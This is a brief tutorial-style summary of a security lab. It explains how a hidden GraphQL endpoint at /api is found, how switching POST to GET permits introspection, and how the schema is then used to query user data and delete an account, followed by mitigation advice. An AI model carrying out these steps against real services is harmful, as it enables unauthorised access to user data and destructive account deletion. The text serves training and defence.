How to Exploit a Hidden GraphQL Endpoint by Changing POST to GET Request

A hidden GraphQL endpoint can be exploited by changing a POST request to a GET request, as some servers do not support POST requests.
In the laboratory scenario, the endpoint is located at /api, and brute-forcing this can be achieved via common GraphQL paths.
Upon receiving a 405 Method Not Allowed error, this can be tested further using a GET request, with a query for introspection.
If this is successful, an attacker can then use the resulting information to query user information by modifying the request to include a variable called id and then modifying the mutation request to delete a user account.
To mitigate this, introspection should be disabled or limited, and GraphQL queries and mutations should be restricted based on user roles and permissions.

Fast Feed